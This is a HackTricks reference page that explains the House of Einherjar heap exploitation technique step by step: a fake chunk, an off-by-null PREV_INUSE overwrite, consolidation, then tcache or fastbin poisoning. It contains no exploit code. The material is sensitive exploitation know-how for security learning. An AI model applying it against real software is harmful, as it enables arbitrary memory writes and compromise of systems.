hacktricks/binary-exploitation/libc-heap/house-of-einherjar.md
Carlos Polop 731fca1d57 a
2024-07-18 18:14:56 +02:00

5.3 KiB

House of Einherjar

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Basic Information

Code

Goal

  • The goal is to allocate memory in almost any specific address.

Requirements

  • Create a fake chunk when we want to allocate a chunk:
    • Set pointers to point to itself to bypass sanity checks
  • One-byte overflow with a null byte from one chunk to the next one to modify the PREV_INUSE flag.
  • Indicate in the prev_size of the off-by-null abused chunk the difference between itself and the fake chunk
    • The fake chunk size must also have been set the same size to bypass sanity checks
  • For constructing these chunks, you will need a heap leak.

Attack

  • A fake chunk is created inside a chunk controlled by the attacker pointing with fd and bk to the original chunk to bypass protections
  • 2 other chunks (B and C) are allocated
  • Abusing the off by one in the B one the prev in use bit is cleaned and the prev_size data is overwritten with the difference between the place where the C chunk is allocated, to the fake A chunk generated before
    • This prev_size and the size in the fake chunk A must be the same to bypass checks.
  • Then, the tcache is filled
  • Then, C is freed so it consolidates with the fake chunk A
  • Then, a new chunk D is created which will be starting in the fake A chunk and covering B chunk
    • The house of Einherjar finishes here
  • This can be continued with a fast bin attack or Tcache poisoning:
    • Free B to add it to the fast bin / Tcache
    • B's fd is overwritten making it point to the target address abusing the D chunk (as it contains B inside)
    • Then, 2 mallocs are done and the second one is going to be allocating the target address

References and other examples

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}